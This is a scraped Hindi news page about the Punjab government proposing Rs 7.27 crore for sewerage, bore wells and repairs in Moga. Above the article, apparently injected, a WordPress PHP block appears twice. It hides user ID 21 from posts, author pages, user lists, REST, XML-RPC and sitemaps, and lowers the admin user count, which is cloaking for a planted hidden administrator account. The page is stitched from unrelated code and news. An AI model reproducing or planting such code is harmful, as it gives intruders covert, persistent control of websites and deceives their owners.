add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
मुख्यमंत्री भगवंत मान के नेतृत्व में पंजाब सरकार ने 7.27 करोड़ रुपये खर्च करने का फैसला किया - Press Ki Taquat
No Result
View All Result
चंडीगढ़,04-05-2023(प्रेस की ताकत)- मुख्यमंत्री भगवंत मान के नेतृत्व वाली पंजाब सरकार राज्य के लोगों को बुनियादी सुविधाएं, स्वच्छ और प्रदूषण मुक्त वातावरण देने के लिए लगातार प्रयास कर रही है। इसी दिशा में एक और कदम बढ़ाते हुए स्थानीय निकाय मंत्री डा. इंदरबीर सिंह निज्जर ने कहा नगर निगम मोगा के विकास कार्यों के लिए 7.27 करोड़ रुपये खर्च करने का प्रस्ताव है।
इस संबंध में स्थानीय निकाय मंत्री डा. इंदरबीर सिंह निज्जर ने कहा कि विकास कार्यों में वार्ड नंबर 40 और 41 में परवाना फाटक से चोखा पैलेस चौक तक सीवरेज लाइन डालना, नगर निगम मोगा में रेन हार्वेस्टिंग रिचार्ज वैल का निर्माण शामिल है और वार्ड न.43 में पुरानी घल्ल कलां रोड पर सीधे बोर लगाने का काम शामिल है।
इसी प्रकार अन्य विकास कार्यों में वार्ड नंबर 15 में कबीर नगर, वार्ड नंबर 24 में साधां वाली बस्ती व वार्ड नंबर 14 में प्रेम नगर में डायरेक्ट बोर लगाना शामिल है। मल्लन शाह रोड के साथ गली में सीवरेज लाइन की व्यवस्था करना और सीवरेज लाइन डालना शामिल है। इन विकास कार्यों में मोगा शहर में विभिन्न डिस्पोजल, मोटरों और सीवर पंपों पर स्थापित मशीनरी की मुरम्मत की योजना भी शामिल है।
डा.निज्जर ने कहा कि इस योजना अधीन मोगा में डंप साइट पर पाईजो मीटर लगाना, सीवर लाइन का प्रबंध, मैनहोल चैंबरो और मोगा शहर जोन सी और डी में गलियों की मुरम्मत शामिल है। इसके इलावा वार्ड नंबर 23 में प्रीतनगर श्मशान घाट, वार्ड नंबर 33 में मोहल्ला सधुआं और महिमेवाला गांव श्मशान घाट में रिवर्स रिग विधि या किसी अन्य नवीनतम तकनीक के साथ डीप बोर (300X200 मिमी) टयूबवैल लगाए जाएगे।
उन्होंने यह भी कहा कि नगर निगम मोगा में इसी तरह और भी कई विकास कार्य करवाने की योजना है।
विकास कार्यों से नगर निगम मोगा में बुनियादी ढांचे और सुविधाओं में सुधार होने आशा है, जिससे निवासियों को बढिया सुविधाएं और रहने योग्य वातावरण मिलेगा।
Post Views: 132
No Result
View All Result